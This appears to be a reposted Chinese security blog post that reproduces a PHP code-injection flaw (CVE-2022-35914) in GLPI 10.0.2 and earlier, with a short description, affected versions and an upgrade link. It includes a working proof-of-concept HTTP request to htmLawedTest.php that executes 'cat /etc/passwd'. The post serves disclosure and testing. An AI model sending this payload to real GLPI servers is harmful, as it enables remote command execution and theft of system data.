GLPI 代码执行漏洞(CVE-2022-35914)

admin 2024年11月24日12:12:54评论42 views字数 780阅读2分36秒阅读模式

网安引领时代,弥天点亮未来   

GLPI 代码执行漏洞(CVE-2022-35914)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
GLPI 代码执行漏洞(CVE-2022-35914)
0x01漏洞介绍

GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,你可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。GLPI 10.0.2及之前版本存在安全漏洞,该漏洞源于htmlawed 模块中的/vendor/htmlawed/htmlawed/htmLawedTest.php允许 PHP 代码注入。

GLPI 代码执行漏洞(CVE-2022-35914)
0x02影响版本

  GLPI 10.0.2及之前版本存在安全漏洞

GLPI 代码执行漏洞(CVE-2022-35914)

GLPI 代码执行漏洞(CVE-2022-35914)
0x03漏洞复现

1.访问漏洞环境

GLPI 代码执行漏洞(CVE-2022-35914)

2.对漏洞进行复现

POC

POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36Connection: closeContent-Length: 39Content-Type: application/x-www-form-urlencodedCookie: sid=fooAccept-Encoding: gzipsid=foo&hhook=exec&text=cat+/etc/passwd

GLPI 代码执行漏洞(CVE-2022-35914)

GLPI 代码执行漏洞(CVE-2022-35914)

3.nuclei工具测试(漏洞存在)

GLPI 代码执行漏洞(CVE-2022-35914)

GLPI 代码执行漏洞(CVE-2022-35914)
0x04修复建议

目前厂商已发布升级补丁以修复漏洞

https://glpi-project.org/fr/glpi-10-0-3-disponible/

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月24日12:12:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GLPI 代码执行漏洞(CVE-2022-35914)https://cn-sec.com/archives/1620062.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息